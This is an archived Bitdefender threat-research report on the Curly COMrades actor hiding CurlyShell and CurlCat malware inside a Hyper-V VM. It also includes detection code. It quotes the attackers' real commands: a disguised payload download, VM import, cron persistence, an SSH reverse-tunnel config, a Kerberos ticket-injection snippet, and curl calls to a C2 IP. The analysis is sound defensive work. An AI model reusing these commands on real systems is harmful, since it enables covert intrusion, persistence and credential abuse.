{
	"id": "a1473814-2bd1-4bdd-9610-db428fa28ad0",
	"created_at": "2026-04-06T00:19:46.52237Z",
	"updated_at": "2026-04-10T03:36:00.766473Z",
	"deleted_at": null,
	"sha1_hash": "3022e37224e3fa2abe43f2cadd50fc8b64422d27",
	"title": "Curly COMrades: Evasion and Persistence via Hidden Hyper-V Virtual Machines",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 578700,
	"plain_text": "Curly COMrades: Evasion and Persistence via Hidden Hyper-V\r\nVirtual Machines\r\nBy Victor Vrabie\r\nArchived: 2026-04-05 15:31:00 UTC\r\nI'd like to thank my coauthors Adrian Schipor and Martin Zugec for their invaluable contributions to this\r\nresearch. \r\nTL;DR This investigation, conducted with support from the Georgian CERT functioning under the Operative-Technical Agency of Georgia, uncovered new tools and techniques used by the Curly COMrades threat actor.\r\nThey established covert, long-term access to victim networks by abusing virtualization features (Hyper-V) on\r\ncompromised Windows 10 machines to create a hidden remote operating environment. \r\nWe first documented the Curly COMrades threat actor, operating to support Russian interests in geopolitical\r\nhotbeds, in August 2025. Since that initial discovery, subsequent forensics and incident response efforts have\r\nrevealed critical new tools and techniques.\r\nValuable support was provided by the Georgian CERT, whose collaboration significantly advanced the\r\ninvestigation. They alerted us to a detected sample communicating with a compromised site we were monitoring,\r\nenabling a joint analysis. The Georgian CERT was then instrumental in acquiring evidence and conducting a\r\nforensic analysis of the compromised site itself, which the attackers used as a proxy for their actual infrastructure. \r\nThe most notable finding in this campaign is the exploitation of legitimate virtualization technologies,\r\ndemonstrating how threat actors are innovating to bypass standard EDR solutions as they become commodity\r\ntools.\r\nThe attackers enabled the Hyper-V role on selected victim systems to deploy a minimalistic, Alpine Linux-based\r\nvirtual machine. 
This hidden environment, with its lightweight footprint (only 120MB disk space and 256MB\r\nmemory), hosted their custom reverse shell, CurlyShell, and a reverse proxy, CurlCat.\r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-evasion-persistence-hidden-hyper-v-virtual-machines\r\nPage 1 of 13\n\nBy isolating the malware and its execution environment within a VM, the attackers effectively bypassed many\r\ntraditional host-based EDR detections. EDR needs to be complemented by host-based network inspection to detect\r\nC2 traffic escaping the VM, and proactive hardening tools to restrict the initial abuse of native system binaries.\r\n(Bitdefender examples: This functional requirement is met by integrating capabilities like Network Attack\r\nDefense (NAD) and Proactive Hardening and Attack Surface Reduction (PHASR).) \r\nThe threat actor demonstrated a clear determination to maintain a reverse proxy capability, repeatedly introducing\r\nnew tooling into the environment. Artifacts identified included a wide array of proxy and tunneling samples, such\r\nas Resocks, Rsockstun, Ligolo-ng, CCProxy, Stunnel, and SSH-based methods. This flexible and layered\r\napproach was critical for sustaining access. \r\nDuring the investigation, it was also uncovered that a PowerShell script designed for remote command execution\r\nabused Kerberos tickets, further expanding the adversary’s operational toolkit. In addition, multiple PowerShell\r\nscripts configured through Group Policy pointed to a deceptively simple yet effective persistence mechanism tied\r\nto local account creation. \r\nThe following section provides a detailed breakdown of these techniques and the evidence uncovered during\r\nanalysis. 
\r\nHyper-V Evasion – Host-Isolated Operational Base \r\nThe most interesting finding is the abuse of native Windows virtualization features to establish a covert, isolated\r\noperational base for the C2 implant directly on the victim host. The threat actors enabled the Hyper-V feature on a\r\ncompromised Windows machine, then downloaded and imported a lightweight Alpine Linux-based VM\r\ncontaining their malware to provide persistent, low-visibility access to the local network. \r\nVirtual Machine Deployment \r\nThe operation began in early July, when two remote commands were executed on two computers to enable the\r\nmicrosoft-hyper-v virtualization feature while disabling its management clients (the Hyper-V Manager GUI tools).\r\nRemoving the console leaves an administrator with no obvious place in which the VM would show up; the Hyper-V\r\nPowerShell cmdlets used later in the chain (Import-VM, Start-VM) belong to a separate optional feature and\r\nremained usable: \r\ndism /online /disable-feature /FeatureName:microsoft-hyper-v-Management-clients /norestart  \r\ndism /online /enable-feature /All /LimitAccess /FeatureName:microsoft-hyper-v /norestart \r\nA few days later, the deployment phase followed. All commands were prefixed with “cmd.exe /C” and all output\r\nwas redirected (both standard output 1 and standard error 2) to a temporary file. \r\n\"cmd.exe\" /C echo curl.exe http://\u003credacted\u003e.md | cmd \u003e c:\\\\Programdata\\\\WindowsUpdateTask_H.tmp 2\u003e\u00261 \r\nThis was a non-intrusive connectivity check for the next download. It uses an unusual redirection pattern: the\r\ncurl.exe command line is echoed to standard output and piped into a secondary cmd.exe process, which executes it. 
\r\n\"cmd.exe\" /C echo curl.exe http://\u003credacted\u003e.md/about.mp4 -o c:\\\\programdata\\\\1.rar | cmd \u003e\r\nc:\\\\Programdata\\\\WindowsUpdateTask_D.tmp 2\u003e\u00261 \r\nUsing the same redirection method, the archive RAR file masquerading as a video file (about.mp4) is saved as\r\n1.rar. \r\n\"cmd.exe\" /C dir \"c:\\\\program Files\" \u003e c:\\\\Programdata\\\\WindowsUpdateTask_X.tmp 2\u003e\u00261 \r\nNext, a dir command was run against c:\\Program Files - likely to verify the presence of required files such as\r\nrar.exe (executed from this location in the next step). \r\n\"cmd.exe\" /C \"c:\\\\program files\\\\WinRAR\\\\rar.exe\" x c:\\\\programdata\\\\1.rar\r\nc:\\\\programdata\\\\microsoft\\\\AppV\\\\app \u003e c:\\\\Programdata\\\\WindowsUpdateTask_z.tmp 2\u003e\u00261 \r\nThe virtual machine files (such as the VHDX and VMCX) are extracted into the deceptive\r\nc:\\\\programdata\\\\microsoft\\\\AppV\\\\app folder. \r\n\"cmd.exe\" /C powershell.exe -c import-vm -path \"c:\\\\programdata\\\\microsoft\\\\AppV\\\\app\\\\Virtual\r\nMachines\\\\1DBCC80B-5803-4AF1-8772-712C688F408A.vmcx\" -Copy -GenerateNewId \u003e\r\nc:\\\\Programdata\\\\WindowsUpdateTask_t.tmp 2\u003e\u00261 \r\nThe Import-VM PowerShell cmdlet is then used to import the virtual machine. This cmdlet registers the pre-configured VM file (.vmcx) extracted in the previous step with the local Hyper-V manager. \r\n\"cmd.exe\" /C powershell.exe -c Start-VM -name WSL \u003e c:\\\\Programdata\\\\WindowsUpdateTask_R.tmp 2\u003e\u00261 \r\nFinally, using the Start-VM PowerShell cmdlet, this newly imported virtual machine is started. While the name\r\nWSL suggests the use of Windows Subsystem for Linux, it’s only a deceptive strategy. WSL is a feature that\r\nallows users to run a Linux environment natively within Windows, and because it is generally considered a benign\r\ndeveloper tool, it often receives less scrutiny. 
It is critical to note that despite the naming convention, this VM is a\r\nfully isolated Hyper-V instance, entirely separate from and outside of the standard Windows Subsystem for Linux\r\nframework. \r\nVirtual Machine Configuration \r\nThe deployed virtual machine was a custom-configured, victim-specific operational environment. Running the\r\nsecurity-oriented, lightweight Alpine Linux, it occupied a mere 120MB of disk space and was configured to use\r\nonly 256MB of memory. The primary goal of this minimalistic environment was to host the custom implants,\r\nCurlyShell and CurlCat, providing a dedicated, isolated base for the reverse shell and reverse proxy operations. Its\r\nminimal footprint and small size minimized the risk of detection, while providing all the tools that attackers\r\nneeded. \r\nThe VM was configured to use the Default Switch network adapter in Hyper-V. This setting routes the VM's\r\ntraffic through the host's network stack using Hyper-V's internal Network Address Translation (NAT) service.\r\nIn effect, all malicious outbound communication appears to originate from the legitimate host machine's IP\r\naddress, and host telemetry that attributes connections to a user-mode process sees no curl or ssh process behind\r\nthese flows, because they enter the network through the virtual switch and NAT rather than through a process on the\r\nhost. Some of the included files also demonstrate a high degree of tailoring for the compromised domain.\r\nExamination of the VM's file system revealed an attacker-controlled domain-to-IP mapping within the /etc/hosts\r\nfile and a specific private DNS server entry in /etc/resolv.conf, confirming that the VM was customized to\r\ncommunicate with the C2 infrastructure. \r\nVirtual Machine Payload \r\nThe VM was not packed with large offensive frameworks or penetration testing tools; instead, it was a lightweight\r\nimplant designed for a very specific purpose. 
The environment hosts only two closely related, custom malware\r\nfamilies - CurlyShell (new malware) and CurlCat (previously documented by Bitdefender) - both built using the\r\nlibcurl library but serving distinctly different operational roles.\r\nCurlyShell provides a persistent reverse shell, while CurlCat manages traffic tunneling, giving the threat actor\r\nrobust network access and the ability to execute commands remotely. This minimalist approach avoids leaving a\r\nheavy forensic footprint. \r\nCurlyShell (MD5: c6dbf3de8fd1fc9914fae7a24aa3c43d) in /bin/init_tools is the core persistent reverse shell. For\r\npersistence, it uses a simple but effective root-level mechanism: a crontab entry in /etc/crontabs, running with root\r\nprivileges, that executes the script /bin/alpine_init at 20 minutes past every fourth hour. The alpine_init script\r\nthen launches init_tools (CurlyShell) itself, detached from the cron job: \r\n#!/bin/sh \r\ndate \u003e /tmp/date \r\nnohup /bin/init_tools \u003e /dev/null 2\u003e\u00261 \u0026 \r\nThe date \u003e /tmp/date line leaves the time of the last cron run in /tmp/date, a useful artifact when timelining the\r\nVM. CurlyShell is responsible for establishing and maintaining the primary reverse shell connection using HTTPS for\r\nits communication, connecting to a specific, separate C2 infrastructure. \r\nCurlCat (MD5: 1a6803d9a2110f86bb26fcfda3606302) in /root/updater manages the SSH reverse proxy tunnel.\r\nIt does not maintain system persistence itself; instead, it can be initiated by a command sent over the persistent\r\nCurlyShell channel when proxy access is needed. Its sole function is to wrap all outgoing SSH traffic into standard\r\nHTTP request payloads, making the traffic blend in on the wire. This capability is integrated directly into the SSH\r\nclient configuration (/root/.ssh/config), where CurlCat is specified as the ProxyCommand, so every subsequent SSH\r\nconnection is carried inside CurlCat's HTTP traffic. The RemoteForward 20155 directive (a port with no destination)\r\nthen asks the SSH server to open a listener on port 20155 on the attacker's side that acts as a SOCKS proxy, with\r\nthe VM as the exit point into the victim's network. 
\r\nHost Forward \r\n    HostName 127.0.0.1 \r\n    Port 22 \r\n    User bob \r\n    StrictHostKeyChecking no \r\n    UserKnownHostsFile /dev/null \r\n    NumberOfPasswordPrompts 1 \r\n    RemoteForward 20155 \r\n    IdentityFile /root/.ssh/id_rsa \r\n    ProxyCommand /root/updater \r\nAuthentication for this tunnel uses a dedicated private key, /root/.ssh/id_rsa, to log in as the user \"bob\" on the\r\nremote C2 infrastructure without a password. HostName and Port are effectively placeholders here, since ProxyCommand\r\nhands the whole connection to CurlCat, and StrictHostKeyChecking no together with UserKnownHostsFile /dev/null\r\ndisables host-key verification, so the C2 side can present any SSH host key. \r\nCurlyShell Analysis \r\nThe two custom implants deployed within the Hyper-V environment, CurlyShell and CurlCat (read our previous\r\nanalysis), share a largely identical code base. Both are compiled binaries written in C++ and built around the\r\nlibcurl library. \r\nThe malware is packaged as an ELF binary, with its core functionality implemented in the main() function. At\r\nstartup, file descriptors 0, 1, and 2 are closed (Standard Input (stdin), Standard Output (stdout), and Standard Error\r\n(stderr)). This action suppresses all output to the terminal and detaches the process from the initiating shell,\r\nrunning the CurlyShell invisibly as a headless background daemon. \r\nThe code then creates an instance of the custom C++ class, SesCustom. \r\nThe program's custom session management begins with the construction of the SesCustom object. This starts with\r\nthe explicit initialization of a custom Base64 alphabet using a hardcoded 64-character string, which is then loaded\r\ninto internal std::map structures. 
This custom character set is used by encoding and decoding methods\r\n(SesCustom::to_enc() and SesCustom::to_dec()) to perform a non-standard Base64 transformation. The purpose\r\nis to evade tools expecting the standard alphabet: a standard Base64 decoder applied to the traffic yields garbage or\r\nan error rather than the plaintext. Furthermore, the constructor immediately calls\r\nSesCustom::get_ses_id() to generate a unique random string, encoded with the custom alphabet, to be used as a PHP\r\nsession cookie in the C2 network traffic. \r\nOnce the SesCustom object is created, a key-value data structure (implemented in C++ as an std::map) containing\r\nthe required HTTP headers is built and passed to the critical SesCustom::init() method along with the C2 URL.\r\nThis header map includes the spoofed PHP session cookie, required for the C2 handshake mechanism. \r\nThe init() method then sets up the libcurl objects and configures the curl_write_callback. This is a standard feature\r\nof the libcurl library; the malware points this callback to its own function, SesCustom::WriteFunction(). When\r\nthe C2 server sends encrypted data back, libcurl hands that raw data off to this custom-written WriteFunction()\r\nfor processing. \r\nAfter initialization, an HTTP GET request is issued to verify C2 responsiveness. The returned data is expected to\r\nprecisely match the PHP session cookie generated earlier. If the response fails to match this session cookie, the\r\ninit() function returns false, causing CurlyShell to terminate immediately; a sandbox or sinkhole that does not echo\r\nthe cookie back therefore never reaches the command loop. If the server is responsive and returns\r\nthe expected value, the function confirms that the target is a live C2, and the core C2 logic is launched via\r\nSesCustom::to_run(), which implements the reverse shell functionality. 
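The custom-alphabet transformation and the cookie handshake described above, as an added example that is not CurlyShell's code and not from the Bitdefender write-up: the alphabet below is a constructed placeholder (the page does not publish the real 64-character string), and the method names mirror the SesCustom names only for readability. Substituting the alphabet recovered from the binary is all an analyst needs to decode captured traffic.

```python
# Added example, not CurlyShell's code: Base64 over a non-standard alphabet,
# the transformation the page attributes to SesCustom::to_enc()/to_dec(),
# plus the session-cookie handshake check from SesCustom::init().
import base64
import secrets

STANDARD_ALPHABET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
# Constructed placeholder: a fixed permutation of the standard alphabet.
# Replace with the 64-character string recovered from the sample.
CUSTOM_ALPHABET = 'zyxwvutsrqponmlkjihgfedcbaZYXWVUTSRQPONMLKJIHGFEDCBA9876543210/+'


class CustomBase64:
    # Two lookup tables, one per direction, like the std::map pair in the binary.
    def __init__(self, alphabet):
        if len(alphabet) != 64 or len(set(alphabet)) != 64:
            raise ValueError('alphabet must be 64 distinct characters')
        self.to_custom = str.maketrans(STANDARD_ALPHABET, alphabet)
        self.to_standard = str.maketrans(alphabet, STANDARD_ALPHABET)

    def to_enc(self, data):
        # Standard encoding, then per-symbol substitution into the custom set.
        # Padding characters are left untouched.
        return base64.b64encode(data).decode('ascii').translate(self.to_custom)

    def to_dec(self, text):
        # Reverse substitution, then standard decoding.
        return base64.b64decode(text.translate(self.to_standard))

    def get_ses_id(self, nbytes=24):
        # Random identifier encoded with the custom alphabet: the value sent as
        # a PHP session cookie and expected back verbatim from a live C2.
        return self.to_enc(secrets.token_bytes(nbytes))


def c2_is_live(expected_cookie, response_body):
    # init() semantics: the GET response must equal the cookie exactly,
    # otherwise the implant exits before reaching its command loop.
    return response_body == expected_cookie


def decode_with_standard_alphabet(text):
    # What an unmodified Base64 decoder makes of the traffic: wrong bytes
    # (or a decode error, reported here as None), never the plaintext.
    try:
        return base64.b64decode(text)
    except Exception:
        return None
```

Encoding is a plain permutation of the output symbols, so the length and padding of the ciphertext still look like ordinary Base64 on the wire; only the symbol-to-value mapping differs, which is why a standard decoder returns bytes that are not the original.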
\r\nUp to this stage, both CurlyShell and CurlCat share almost identical code, with their logic overlapping almost\r\nentirely. The key distinction lies in the to_run() method: in CurlyShell, the received data is interpreted as\r\ncommands to execute, whereas in CurlCat it is forwarded directly to the SSH process. \r\nThe decompiled view shows similarities between CurlCat (left) and CurlyShell (right) code. \r\nThe actual C2 communication and command execution happen in the to_run() method. The method manages data\r\nexchange by switching between HTTP methods: it uses HTTP POST requests to send command output back to the\r\nC2 when data is available, and falls back to HTTP GET requests to poll the server when there is no data to send. \r\nThe primary distinction between the two implants lies in how they process the server’s response. CurlyShell,\r\nbeing the reverse shell, executes incoming commands using the SesCustom::to_pipe() function, which internally\r\nrelies on the popen() library call. The received command is wrapped as timeout 30 sh -c '\u003ccommand\u003e' 2\u003e\u00261 to\r\nlimit the execution time (30 seconds) and capture both standard output and error, so a hung command cannot stall\r\nthe beacon loop. CurlCat, in contrast, is designed only for data relay; it completely bypasses command execution\r\nand instead uses the SesCustom::to_out() and SesCustom::from_in() functions to simply relay raw data. \r\nPowerShell Scripts \r\nThe investigation uncovered two distinct types of PowerShell scripts linked to the attackers. One type was\r\ndesigned to inject a Kerberos ticket into LSASS, enabling authentication to remote systems and execution of\r\ncommands. 
The other was deployed via Group Policy to create a local account across domain-joined machines,\r\nlikely to achieve persistence. \r\nKerberos Ticket Injector \r\nThe threat actor's customized tooling is nicely illustrated by a script dropped at c:\\programdata\\kb_upd.ps1 and\r\nexecuted remotely via PowerShell (often using atexec). This script is a two-part template for remote command\r\nexecution. The first part, which handles loading and injecting a Kerberos ticket into LSASS, is almost identical to\r\nthe public TicketInjector utility. But while the C# string assigned to the $ptt variable is stored in plaintext in the\r\noriginal version, it’s encrypted and stored as a SecureString in this version with a hardcoded key: \r\n$key = (9,25,37,10,5,54,91,82,75,19,13,32,17,94,23,11) \r\n$decData = ConvertTo-SecureString -String $buf -Key $key \r\n$ptt = [Runtime.InteropServices.Marshal]::PtrToStringAuto([Runtime.InteropServices.Marshal]::SecureStringToBSTR($decData)) \r\nThe 16-byte $key is used by ConvertTo-SecureString as an AES key, so this is obfuscation rather than protection:\r\nanyone holding the script can decrypt the embedded C# the same way, and the $ptt string is recoverable from memory\r\nonce the script runs. Once decrypted, the embedded C# code is compiled and loaded into memory by the Load() function,\r\nwhich serves the same purpose as the original TicketInjector utility's entry point. This compiled C# code is\r\nresponsible for the actual low-level manipulation of the Kerberos tickets within the LSASS process. \r\nThe second part of the PowerShell script defines two additional functions essential for post-exploitation: \r\nTicket Injection: One function invokes the Load() routine to read the Kerberos ticket and inject the\r\nmodified version into LSASS.\r\nLateral Movement (RemoteWorker): The other key function, RemoteWorker(), executes lateral movement\r\ncommands.\r\nThe RemoteWorker() function is designed as a template for executing post-exploitation tasks, using the newly\r\ninjected Kerberos tickets to authenticate against remote systems via SMB. 
The following example illustrates this\r\noperation: it uses net use to connect to a remote share, runs reconnaissance commands (dir \\\\\u003credacted\u003e\\C$\\users)\r\nto collect data about user profiles and system files, then deletes the connection, and immediately clears the current\r\nticket cache using klist purge. The function's flexible structure means the threat actor can easily substitute the\r\ncommands for file deletion, malware deployment, or further lateral movement. \r\nAn example of the RemoteWorker() function. \r\nLocal Account Persistence \r\nDuring forensic analysis, a suspicious PowerShell script was discovered on multiple compromised systems. Found\r\nat c:\\Windows\\ps1\\screensaver.ps1, the script reset the password of a local account named user, creating the\r\naccount if it did not already exist—likely as a persistence mechanism. \r\nThis script was later replaced by a variant named c:\\Windows\\ps1\\locals.ps1, which instead targeted a local\r\naccount called camera. Further analysis showed the script originated from \\\\\u003cdomain\u003e\\NETLOGON\\GPO\r\ntest\\Scripts\\Localps.ps1, indicating it was distributed through Group Policy. The recurring password reset routine\r\nsuggests an effort to counteract remediation attempts by ensuring continued access even if defenders change the\r\naccount’s password. \r\nAt first, these scripts could not be directly linked to the attack. 
However, more recent activity involving an attempt\r\nto deploy a Resocks binary revealed that the c:\\Windows\\ps1\\ directory was actively used by this threat actor,\r\nwhich ties these scripts to the intrusion with medium confidence: \r\ncmd.exe /C C:\\Windows\\ps1\\utc.exe 45.43.91[.]10:443 --key \u003credacted\u003e \u003e C:\\Programdata\\regid_1992 2\u003e\u00261  \r\ncmd.exe /C curl http://45.43.91[.]10:443 \u003e C:\\Programdata\\regid_1992 2\u003e\u00261 \r\ncmd.exe /C curl ipinfo.io \u003e C:\\Programdata\\regid_1992 2\u003e\u00261 \r\nInternational Collaboration and C2 Analysis \r\nThe successful mapping and detailed analysis of the CurlCat communication channel were made possible through\r\nswift international cooperation with the Georgian National CERT (CERT.OTA.GOV.GE). This collaboration\r\ndemonstrates the critical value of shared threat intelligence in dismantling sophisticated operations. \r\nThe initial connection was established when the Georgian CERT contacted our team regarding a detected CurlCat\r\nsample observed on a system they were monitoring, which was communicating with a compromised site we were\r\nalso tracking. We provided them with an initial analysis of the malware's communication protocol and identified\r\nthe compromised Georgian website being used as an apparent Command and Control (C2) server. \r\nThe Georgian CERT successfully seized the compromised server and performed a detailed forensic analysis,\r\nsharing their findings to complete the picture of the attacker's infrastructure. 
\r\nThe forensic analysis of the seized, compromised server (running NGINX) provided the following insights\r\ninto how the attackers used the site to relay CurlCat traffic: \r\nThe attackers configured iptables rules to redirect traffic on port 443 from a specific victim to the attacker’s\r\ninfrastructure at 88.198.91[.]116 on port 22. All other traffic remained unaffected.\r\nThe analysis confirmed the finding from the malware side: the CurlCat sample had been configured with\r\nlibcurl options that disabled TLS certificate verification (peer and host name checks). This allowed the attackers\r\nto use arbitrary certificates on the compromised server and still terminate the HTTPS session there, decrypting\r\nthe traffic and extracting the encapsulated SSH communications.\r\nIn addition, the attackers manually started an sshd service on port 31637 with a customized configuration\r\nand deployed an application-level proxy service on port 443. This proxy implemented TLS and redirected\r\ntunneling traffic to the hidden sshd service.\r\nThe attackers demonstrated a high level of operational security, leaving few traces on the compromised\r\nhost. For example, they issued the unset HISTFILE command to prevent their activity from being recorded\r\nin shell history.\r\nConclusion and Recommendations \r\nThe investigation revealed that the attackers relied on a combination of custom malware and stealth techniques to\r\nestablish and maintain persistence within the victim environment. Two custom malware families — CurlyShell\r\nand CurlCat — were at the center of this activity, sharing a largely identical code base but diverging in how they\r\nhandled received data: CurlyShell executed commands directly, while CurlCat funneled traffic through SSH.\r\nThese tools were deployed and operated to ensure flexible control and adaptability. \r\nA key aspect of the campaign was the abuse of virtualization technologies. 
By enabling Hyper-V and running\r\nlightweight virtual machines, the attackers created isolated environments from which reverse shells, proxies, and\r\ncustom malware could operate. This isolation protected the custom malware from behavioral analysis, EDR, and\r\nstatic signature scanning that would normally run on the host operating system. However, the resulting reverse\r\nshells and C2 traffic still had to exit the host machine via the network stack.\r\nThis means that while the malware remained isolated, a security layer like Network Attack Defense (NAD)\r\nrunning on the host can still intercept and detect malicious communication patterns as traffic passes through the\r\nhost's network interfaces. NAD includes algorithms for generic content identification, allowing it to recognize\r\nobjects such as executables or URL addresses, even for previously unknown or custom-built protocols. \r\nThroughout the activity, the threat actor demonstrated a strong focus on stealth and operational security.\r\nTechniques included encrypting embedded payloads, abusing native PowerShell capabilities, and minimizing\r\nforensic traces on compromised systems.\r\nTo counter stealthy lateral movement, organizations must detect abnormal access to the LSASS process and\r\nsuspicious Kerberos ticket creation or injection attempts, which occur outside the VM and are highly detectable.\r\nUse GravityZone EDR/XDR capabilities to detect malicious access to credential processes and mitigate memory-based attacks. For organizations operating with a lean security staff, adopting Managed Detection and Response\r\n(MDR) services offers an effective solution. 
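The VM itself is out of reach of host EDR, but every step that put it there (the dism commands, the echo | cmd download, the rar extraction into ProgramData, Import-VM and Start-VM) and the RemoteWorker() clean-up (klist purge) ran on the host as ordinary process creations. As an added example that is not from the page or from Bitdefender, the rule set below scores those steps over constructed process-creation records; the record fields (id, host, command_line) are assumptions about the log format, not any product's schema, and the sample command lines are built from the page's chain with the redacted hostname replaced by a placeholder.

```python
# Added example, not from the page or Bitdefender: flag the host-side steps of
# the hidden-VM deployment chain and the RemoteWorker() ticket-cache purge in
# process-creation events, then require several chain steps per host before
# raising, since dism enabling Hyper-V alone is routine IT automation.

def norm(command_line):
    # Lower-case and collapse whitespace so rules can use simple substring tests.
    return ' '.join(command_line.lower().split())

# Each rule: (name, predicate over the normalised command line).
RULES = [
    ('hyperv_role_enabled_via_dism',
     lambda c: 'dism' in c and '/enable-feature' in c and 'featurename:microsoft-hyper-v' in c),
    ('hyperv_mgmt_clients_disabled',
     lambda c: 'dism' in c and '/disable-feature' in c and 'management-clients' in c),
    ('echo_piped_into_cmd_with_curl',
     lambda c: 'echo curl' in c and '| cmd' in c),
    ('rar_extract_into_programdata',
     lambda c: 'rar.exe' in c and ' x ' in c and 'programdata' in c),
    ('import_vm_from_programdata',
     lambda c: 'import-vm' in c and 'programdata' in c),
    ('start_vm_named_wsl',
     lambda c: 'start-vm' in c and '-name wsl' in c),
    ('kerberos_ticket_cache_purged',
     lambda c: 'klist' in c and 'purge' in c),
]

# The deployment chain the page documents; several of these on one host is far
# more specific than any single rule.
DEPLOYMENT_RULES = {
    'hyperv_role_enabled_via_dism', 'hyperv_mgmt_clients_disabled',
    'echo_piped_into_cmd_with_curl', 'rar_extract_into_programdata',
    'import_vm_from_programdata', 'start_vm_named_wsl',
}

def evaluate(events):
    # Returns (host, rule_name, event_id) for every rule that fires.
    findings = []
    for ev in events:
        c = norm(ev['command_line'])
        for name, pred in RULES:
            if pred(c):
                findings.append((ev['host'], name, ev['id']))
    return findings

def hosts_with_deployment_chain(findings, min_steps=3):
    # A host is flagged when at least min_steps distinct chain rules fired on it.
    per_host = {}
    for host, name, _ in findings:
        if name in DEPLOYMENT_RULES:
            per_host.setdefault(host, set()).add(name)
    return sorted(h for h, names in per_host.items() if len(names) >= min_steps)

# Constructed sample events: one attacker host running the full chain, one host
# with only the ticket-cache purge, and a developer workstation (benign noise).
EVENTS = [
    {'id': 1, 'host': 'ws01', 'command_line': 'dism /online /disable-feature /FeatureName:microsoft-hyper-v-Management-clients /norestart'},
    {'id': 2, 'host': 'ws01', 'command_line': 'dism /online /enable-feature /All /LimitAccess /FeatureName:microsoft-hyper-v /norestart'},
    {'id': 3, 'host': 'ws01', 'command_line': 'cmd.exe /C echo curl.exe http://example.invalid/about.mp4 -o c:\\\\programdata\\\\1.rar | cmd > c:\\\\Programdata\\\\WindowsUpdateTask_D.tmp 2>&1'},
    {'id': 4, 'host': 'ws01', 'command_line': 'cmd.exe /C c:\\\\program files\\\\WinRAR\\\\rar.exe x c:\\\\programdata\\\\1.rar c:\\\\programdata\\\\microsoft\\\\AppV\\\\app > c:\\\\Programdata\\\\WindowsUpdateTask_z.tmp 2>&1'},
    {'id': 5, 'host': 'ws01', 'command_line': 'cmd.exe /C powershell.exe -c import-vm -path c:\\\\programdata\\\\microsoft\\\\AppV\\\\app\\\\Virtual Machines\\\\vm.vmcx -Copy -GenerateNewId'},
    {'id': 6, 'host': 'ws01', 'command_line': 'cmd.exe /C powershell.exe -c Start-VM -name WSL'},
    {'id': 7, 'host': 'ws02', 'command_line': 'cmd.exe /C klist purge'},
    {'id': 8, 'host': 'dev07', 'command_line': 'dism /online /enable-feature /FeatureName:microsoft-hyper-v /All /norestart'},
    {'id': 9, 'host': 'dev07', 'command_line': 'powershell.exe Import-VM -Path D:\\\\Exports\\\\lab\\\\lab.vmcx -Copy -GenerateNewId'},
]

if __name__ == '__main__':
    found = evaluate(EVENTS)
    for f in found:
        print(f)
    print('deployment chain on:', hosts_with_deployment_chain(found))
```

Substring rules are deliberately loose (the attacker can rename the VM or the drop folder); the value is in the per-host aggregation, which ties the individually weak signals together, and in the fact that all of them fire before the VM exists.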
\r\nThe sophistication demonstrated by Curly COMrades confirms a key trend: as EDR/XDR solutions become\r\ncommodity tools, threat actors are getting better at bypassing them through tooling or techniques like VM\r\nisolation.\r\nTo counter this, organizations must move beyond relying on a single security layer and implement defense-in-depth, multilayered security. It is critical to start designing the entire environment to be hostile to attackers. This\r\nmeans using solutions that restrict an adversary's operational space, such as Proactive Hardening and Attack\r\nSurface Reduction (PHASR), which prevents the abuse of native system tools and forces attackers to take riskier,\r\nmore detectable actions, thereby raising the operational cost of the attack and securing the environment at every\r\nlayer. \r\nIOCs and How to Follow Our Research \r\nFor our OEM partners and integrations, access to our threat intelligence data is primarily provided\r\nprogrammatically. We also offer a user interface, IntelliZone Portal. This is where partners get more ways to\r\ninteract with our data, like an operational dashboard of threats targeting their industry. A full breakdown of this\r\nresearch can be found on the platform under ThreatID BDuos7k53t: \r\nhttps://intellizone.bitdefender.com/en/threat-search/threats/BDuos7k53t \r\nBeyond our core TI platform, here are three more ways to stay current with our research. \r\nPublic IOCs on GitHub \r\nWe are hosting all Indicators of Compromise (IOCs) from this and all future research on a public GitHub\r\nrepository to improve accessibility and collaboration for the entire security community: \r\nhttps://github.com/bitdefender/malware-ioc/blob/master/2025_11_04-curlycomrades-iocs.csv\r\nCtrl-Alt-DECODE \r\nThis research is part of Ctrl-Alt-DECODE, Bitdefender’s newly established threat intelligence initiative. \r\n1. 
Subscribe to the Newsletter: Get exclusive threat intelligence, original research, and actionable advisories\r\ndirectly from Bitdefender Labs and MDR teams:\r\nhttps://www.linkedin.com/newsletters/7371216616015036416/\r\n2. Watch the Live Series: See the expert analysis on the Curly COMrades on our next Ctrl-Alt-DECODE\r\nepisode (or catch up with our previous episodes). For this session, we're excited to welcome the\r\nBitdefender Labs researcher who led the forensic analysis joining us in the chat, giving you a rare\r\nopportunity to ask technical questions about the research, or even what it's really like to work in\r\ncybersecurity forensics.\r\nSource: https://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-evasion-persistence-hidden-hyper-v-virtual-machines",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-evasion-persistence-hidden-hyper-v-virtual-machines"
	],
	"report_names": [
		"curly-comrades-evasion-persistence-hidden-hyper-v-virtual-machines"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "8cb98420-1ff5-4a85-977b-b4e063eec334",
			"created_at": "2026-01-17T02:00:03.200683Z",
			"updated_at": "2026-04-10T02:00:03.896419Z",
			"deleted_at": null,
			"main_name": "Curly COMrades",
			"aliases": [],
			"source_name": "MISPGALAXY:Curly COMrades",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434786,
	"ts_updated_at": 1775792160,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3022e37224e3fa2abe43f2cadd50fc8b64422d27.pdf",
		"text": "https://archive.orkl.eu/3022e37224e3fa2abe43f2cadd50fc8b64422d27.txt",
		"img": "https://archive.orkl.eu/3022e37224e3fa2abe43f2cadd50fc8b64422d27.jpg"
	}
}